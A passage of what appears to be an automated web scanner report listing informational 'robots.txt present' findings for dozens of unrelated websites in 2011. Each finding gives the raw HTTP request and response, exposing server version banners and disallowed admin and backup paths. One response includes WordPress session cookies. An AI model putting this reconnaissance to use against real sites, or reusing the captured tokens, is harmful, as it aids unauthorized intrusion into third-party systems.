GET /robots.txt HTTP/1.0
Host: www.thane.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:33 GMT
Server: Apache
Last-Modified: Fri, 26 Mar 2010 19:39:40 GMT
ETag: "229f05c-5e-482b953015700"
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /classes/
Disallow: /backend/
Disallow: /includes/
Disallow: /styles/

27.1580. http://www.the-leader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-leader.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-leader.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:43 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
Age: 759
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache6.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache6.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

27.1581. http://www.theagapecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theagapecenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theagapecenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:09 GMT
Server: Apache
Last-Modified: Wed, 02 Jun 2010 23:26:42 GMT
ETag: "800d498a-13c-4c06e8b2"
Accept-Ranges: bytes
Content-Length: 316
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /_fpclass
Disallow: /_private
Disallow: /_themes
Disallow: /_vti_cnf
Disallow: /_vti_log
Disallow: /_vti_pvt
Disallow: /_vti_script
Disallow: /_vti_txt

Disallow: /cgi-bin
Dis
...[SNIP]...

27.1582. http://www.theamericanmonk.com/members/forgot-password  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /members/forgot-password

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theamericanmonk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:55:09 GMT
Server: Apache
Last-Modified: Wed, 06 Apr 2011 04:13:03 GMT
ETag: "355316-1ac-4a038357f71c0"
Accept-Ranges: bytes
Content-Length: 428
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.1583. http://www.theattractionforums.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theattractionforums.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theattractionforums.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 15 Apr 2009 05:48:50 GMT
ETag: "898078-2f9-4679180765480"
Accept-Ranges: bytes
Content-Length: 761
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/archive/
Disallow: /forum/admincp/
Disallow: /forum/attachments/
Disallow: /forum/calendar.php
Disallow: /forum/clientscript/
Disallow: /forum/cpstyles/
Disallow:
...[SNIP]...

27.1584. http://www.thebidsearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thebidsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thebidsearch.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:02:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 28 Nov 2010 05:34:11 GMT
ETag: "738034-54-4f8e10c0"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /go/
Disallow: /go.php
Disallow: /go_session_header.php

27.1585. http://www.thecalifornian.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thecalifornian.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thecalifornian.com

Response

HTTP/1.0 200 OK
Content-Length: 740
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:22:29 GMT
Accept-Ranges: bytes
ETag: "80289598d879cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Wed, 04 May 2011 01:05:50 GMT
Connection: close

# Robots.txt
# Be nice.
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallow: /apps/pbcs.dll/classifieds
Disallow: /apps/pbcs.dll/events
Disallow: /apps/pbcs.dll/index
Disallow: /a
...[SNIP]...

27.1586. http://www.thechildrenswearoutlet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thechildrenswearoutlet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thechildrenswearoutlet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 14 Apr 2011 13:25:38 GMT
ETag: "53a82e6-128-4a0e0dc6b9880"
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

User-agent: googlebot
Disallow:
User-agent: *
Disallow: /images/thumbnails/
Disallow: /skins/
Disallow: /payments/
Disallow: /store_closed.html
Disallow: /core/
Disallow: /lib/
Disallow: /insta
...[SNIP]...

27.1587. http://www.thecitizen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thecitizen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thecitizen.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 15 Aug 2010 08:53:47 GMT
ETag: "2deec32-694-48dd8da9cbcc0"
Accept-Ranges: bytes
Content-Length: 1684
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:25:00 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1588. http://www.thecuriousdreamer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thecuriousdreamer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thecuriousdreamer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:18 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 01:26:11 GMT
ETag: "e00abca0-18-4d0181b3"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.1589. http://www.thedollpalace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thedollpalace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thedollpalace.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:06 GMT
Server: Apache
Last-Modified: Wed, 28 Feb 2007 14:48:23 GMT
ETag: "4323c8-6e-7758bbc0"
Accept-Ranges: bytes
Content-Length: 110
Connection: close
Content-Type: text/plain

# robots.txt for thedollpalace.com
# 5/1/2006
User-agent: *
Disallow: /tdp_list/

# End robots.txt file

27.1590. http://www.thefirstpost.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefirstpost.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefirstpost.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:51 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 11:56:02 GMT
ETag: "18-474f272b1b880"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.1591. http://www.thehawkeye.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehawkeye.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehawkeye.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 02:28:42 GMT
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 91
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /_private/
Sitemap: http://www.thehawkeye.com/SiteMapWeb.aspx


27.1592. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehealthplan.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 323
Content-Type: text/plain
Content-Location: http://www.thehealthplan.com/robots.txt
Last-Modified: Thu, 01 Apr 2010 19:54:50 GMT
Accept-Ranges: bytes
ETag: "d2aa9830d5d1ca1:2e8a"
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=CECB96744EF12DCC8F7303A0E153D72B; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=CECB96744EF12DCC8F7303A0E153D72B; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:45 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

User-agent: *
Disallow: /GHPCommon/
Disallow: /GHPCFIncludes/
Disallow: /GHP_Custom_Errors/
Disallow: /inc/
Disallow: /sitesearch/
Disallow: /webdatacoor/
Disallow: /providersearch/
Disallow:
...[SNIP]...

27.1593. http://www.thehockeynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehockeynews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehockeynews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:36 GMT
Last-Modified: Fri, 16 Apr 2010 13:35:10 GMT
ETag: "1000d28-17c6-4845aae1e7f80"
Accept-Ranges: bytes
Content-Length: 6086
Cache-Control: max-age=-33046766
Expires: Fri, 16 Apr 2010 13:40:10 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /classes/
Disallow: /.l.ments/
Disallow: /fonctions/
Disallow: /templates/
Disallow: /templates_c/
Disallow: /tsn/


###
#Unsaf
...[SNIP]...

27.1594. http://www.thehorrordome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehorrordome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehorrordome.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 00:50:03 GMT
Content-Length: 657
Content-Type: text/plain
Last-Modified: Mon, 26 Oct 2009 17:59:25 GMT
Accept-Ranges: bytes
ETag: "807cb3d6656ca1:68b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *

Disallow: /mcp/
Disallow: /themes/
Disallow: /account.aspx
Disallow: /cart.aspx
Disallow: /change-password.aspx
Disallow: /checkout.aspx
Disallow: /custom.css.aspx
Disallow: /
...[SNIP]...

27.1595. http://www.thelaughtermovie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelaughtermovie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thelaughtermovie.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Mar 2011 16:30:42 GMT
ETag: "1888439-63f-49d6e5140b080"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1596. http://www.thelocal.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thelocal.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thelocal.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 SVN/1.4.6 PHP/5.2.4-2ubuntu5.14 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Tue, 18 Jan 2011 11:58:03 GMT
ETag: "eea2dd-53c-49a1d9cd868c0"
Accept-Ranges: bytes
Content-Length: 1340
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# robot? therefore you are.

User-agent: Mediapartners-Google*
Disallow:

User-agent: Slurp
Crawl-delay: 1
Disallow: /scripts
Disallow: /styles
Disallow: /images
Disallow: /popups
Disallow: /article.p
...[SNIP]...

27.1597. http://www.themeltingpotclubfondue.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.themeltingpotclubfondue.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.themeltingpotclubfondue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:39:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 31 Jul 2009 14:27:29 GMT
ETag: "3e-3851b640"
Accept-Ranges: bytes
Content-Length: 62
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /survey/
Disallow: /coupon/
Allow: /


27.1598. http://www.themlsonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.themlsonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.themlsonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:55 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.3.2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 23 Mar 2011 18:38:29 GMT
ETag: "a5095f3-4a-49f2aaac01340"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: *,*.html
Disallow: /ad/*
Disallow: /view_tracking*

27.1599. http://www.thenoobschool.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thenoobschool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thenoobschool.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:52:08 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 00:44:12 GMT
ETag: "26f41af-3a5-49b5b7dc"
Accept-Ranges: bytes
Content-Length: 933
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.7.2.1 2007/03/23 18:57:07 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

27.1600. http://www.thepartyworks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thepartyworks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thepartyworks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:43 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1465
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 01:12:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /badSpiderTrap.php
Disallow: /account.php
Disallow: /advanced_search.php
Disallow: /advanced_search_result.php
Disallow: /checkout_shipping.php
Disallow: /create_account.php
Di
...[SNIP]...

27.1601. http://www.theperformanceleader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theperformanceleader.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theperformanceleader.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:02:41 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.13
X-Pingback: http://www.theperformanceleader.com/xmlrpc.php
Content-Length: 85
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.theperformanceleader.com/sitemap.xml.gz

27.1602. http://www.therunaways.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therunaways.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.therunaways.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://therunaways.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1603. http://www.theshoemart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theshoemart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theshoemart.com

Response

HTTP/1.1 200 OK
Server: ethProxy
Date: Wed, 04 May 2011 04:09:00 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Last-Modified: Tue, 21 Jul 2009 17:38:36 GMT
ETag: "787030-92-46f3ab9647f00"
Accept-Ranges: bytes
Content-Length: 146

User-agent: *
Disallow: /cgi-bin/Make-a-Store.cgi
Disallow: /cgi-bin/email.cgi
Disallow: /search/
Disallow: /m/c-m.html
Disallow: /wcw/c-wcw.html

27.1604. http://www.thesunsfinancialdiary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thesunsfinancialdiary.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thesunsfinancialdiary.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:07:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 04 May 2011 01:36:50 GMT
Accept-Ranges: bytes
Content-Length: 1099
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Disallow: /cgi-bin/
Disallow: /wp-
Disallow: /admin/login.php
Disallow: /admin/
Disallow: /html/secure.php
Disallow: /rd/
Disallow: /go/
Disallow: /credit-cards/
Disallow:
...[SNIP]...

27.1605. http://www.thetvnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thetvnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thetvnet.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 29 Apr 2011 07:52:56 GMT
Accept-Ranges: bytes
ETag: "a25f8873426cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:15:21 GMT
Connection: close
Content-Length: 3381

# robots.txt
User-agent: *
Sitemap: http://thetvnet.com/sitemap0.xml
Sitemap: http://thetvnet.com/sitemap0a.xml
Sitemap: http://thetvnet.com/sitemap1.xml
Sitemap: http://thetvnet.com/sitemap2.xml
...[SNIP]...

27.1606. http://www.theusgenweb.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theusgenweb.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theusgenweb.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:19 GMT
Server: Apache
Connection: close
Content-Type: text/html

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/

27.1607. http://www.thewebfiles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thewebfiles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thewebfiles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:13 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 01 Sep 2009 21:22:36 GMT
Accept-Ranges: bytes
Content-Length: 1317
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
# disallow all files in these directories
Disallow: /cgi-bin/
Disallow: /stats/
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /contact/
Disallow: /tag/
Disallow: /wp-content/th
...[SNIP]...

27.1608. http://www.thewhatifmovie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thewhatifmovie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thewhatifmovie.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:57:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://thewhatifmovie.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Set-Cookie: wpmp_switcher=desktop; expires=Thu, 03-May-2012 00:57:36 GMT; path=/
Set-Cookie: wordpress_01925182590d4d2cb8683c5190ccfcc8=%7C1305680256%7Cbb7dbad51dde3e37e6042a9269c31e4d; expires=Wed, 18-May-2011 00:57:36 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_01925182590d4d2cb8683c5190ccfcc8=%7C1305680256%7Cbb7dbad51dde3e37e6042a9269c31e4d; expires=Wed, 18-May-2011 00:57:36 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_01925182590d4d2cb8683c5190ccfcc8=%7C1305680256%7Ca2351dc4e9ee6a3e26554752e6037f37; expires=Wed, 18-May-2011 00:57:36 GMT; path=/; httponly
Set-Cookie: wphc_seen=1; expires=Thu, 05-May-2011 00:57:36 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://thewhatifmovie.com/sitemap.xml.gz

27.1609. http://www.thewheelconnection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thewheelconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thewheelconnection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 03 Dec 2010 00:39:40 GMT
ETag: "cb0b77-ce-49676c60eab00"
Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /images/
Disallow: /images/gallery-images/
Disallow: /php/gallery.php
Disallow: /1stoprimshop.com/modules/
Disallow: /1stoprimshop.com/images/
Disallow: /thedealonwheels.com/im
...[SNIP]...

27.1610. http://www.theworldsbestever.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworldsbestever.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theworldsbestever.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:02:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 23 Sep 2010 15:48:26 GMT
Accept-Ranges: bytes
Content-Length: 90
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
sitemap: http://cdn.attracta.com/sitemap/236602.xml.gz

27.1611. http://www.thewvsr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thewvsr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thewvsr.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-Pingback: http://thewvsr.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://thewvsr.com/sitemap.xml.gz

27.1612. http://www.thinkdigit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thinkdigit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thinkdigit.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:59 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Wed, 09 Feb 2011 10:19:00 GMT
ETag: "554-49bd6cb1fad00"
Accept-Ranges: bytes
Content-Length: 1364
Cache-Control: max-age=620
Expires: Wed, 04 May 2011 02:00:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ctc/
Disallow: /admin_templates_c/
Disallow: /templates_c/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /backups/
Disallow: /facebook_poll/
Disallow: /plugins/
Disallow: /l
...[SNIP]...

27.1613. http://www.thisibelieve.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thisibelieve.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thisibelieve.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:52 GMT
Server: Apache/2.2.14
Last-Modified: Wed, 26 Aug 2009 19:02:58 GMT
ETag: "278884-fa-472101965fc80"
Accept-Ranges: bytes
Content-Length: 250
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /essaymgmt/
Disallow: /Templates/
Disallow: /search/
Disallow: /essays/
Disallow: /theme/
Disallow: /wp-includes/
Disallow: /wp-content/
Disallow: /wp-admin/
Disallow: /*s=

Si
...[SNIP]...

27.1614. http://www.ticalc.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticalc.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticalc.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:31:23 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 02 Jan 2009 18:32:20 GMT
ETag: "1a42b9-95-45f84294bd500"
Accept-Ranges: bytes
Content-Length: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# robots.txt for ticalc.org
User-agent: *
Disallow: /cgi-bin
Disallow: /includes
Disallow: /pub/text/logs
Disallow: /about/oldticalc/misc/zshell.txt

27.1615. http://www.tightrope.cc/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tightrope.cc
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

